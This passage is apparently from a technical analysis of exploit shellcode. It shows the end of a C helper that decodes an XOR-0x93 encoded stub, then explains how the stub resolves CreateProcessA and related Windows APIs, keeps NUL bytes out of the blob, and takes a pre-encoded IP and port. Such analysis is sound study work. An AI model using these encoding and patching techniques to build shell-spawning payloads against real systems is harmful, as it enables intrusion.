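    for (i = 0; i < n; i++) printf("  %s\n", names[i]);

    printf("127.0.0.1 pre-encoded: 0x%08x\n", pre_encode_dword(0x0100007fu, d.key));
    return 0;
}
```

The first decoded bytes are `e8 77 00 00 00`, a call over the string table that pushes its address, followed by "GetProcAddress", "LoadLibraryA", "CreateProcessA" and "CloseHandle"; the 0x93 key also turns the NULs between those names into 0x93 so the encoded blob carries none. The same transform is why main's port and IP are XORed before being written at chunk_o_stuff3[378] and [383]: both offsets fall inside the 0x199 bytes the stub decodes.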
